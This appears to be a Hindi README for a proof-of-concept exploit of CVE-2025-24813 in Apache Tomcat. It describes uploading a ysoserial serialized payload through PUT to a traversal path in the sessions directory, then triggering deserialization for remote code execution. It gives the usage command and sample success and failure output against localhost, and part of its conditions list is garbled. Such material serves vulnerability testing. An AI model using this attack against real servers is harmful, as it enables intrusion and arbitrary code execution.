
यह रिपॉजिटरी **CVE-2025-24813** का शोषण करने के लिए एक स्वचालित प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल करता है, जो Apache Tomcat में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। यह भेद्यता एक हमलावर को सर्वर पर एक दुर्भावनापूर्ण सीरियलाइज़्ड पेलोड अपलोड करने की अनुमति देती है, जिससे विशिष्ट शर्तें पूरी होने पर डीसीरियलाइज़ेशन के माध्यम से मनमाना कोड निष्पादन होता है।
CVE-2025-24813 एक सैद्धांतिक RCE भेद्यता है Apache Tomcat में जो अपलोड की गई सत्र फ़ाइलों और डिसीरियलाइज़ेशन तंत्रों के अनुचित संचालन का लाभ उठाती है। एक लिखने योग्य निर्देशिका (जैसे, /uploads/../sessions/) में एक निर्मित पेलोड अपलोड करके, एक हमलावर डिसीरियलाइज़ेशन को ट्रिगर कर सकता है, जिसके परिणामस्वरूप लक्ष्य सर्वर पर मनमाना कमांड निष्पादित होता है।
इस PoC के लिए भेद्यता का सफलतापूर्वक शोषण करने हेतु निम्नलिखित शर्तों को पूरा करना होगा:
/index.jsp पर GET अनुरोध के माध्यम से) और पेलोड के डिसीरियलाइज़ेशन को ट्रिगर करना होगा।ysoserial का उपयोग करके पेलोड उत्पन्न किए जा सकें या Java-आधारित पेलोड संकलित किए जा सकें।ysoserial पेलोड प्रकार का उपयोग किया जा रहा है, तो ysoserial.jar फ़ाइल स्थानीय रूप से उपलब्ध होनी चाहिए।python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser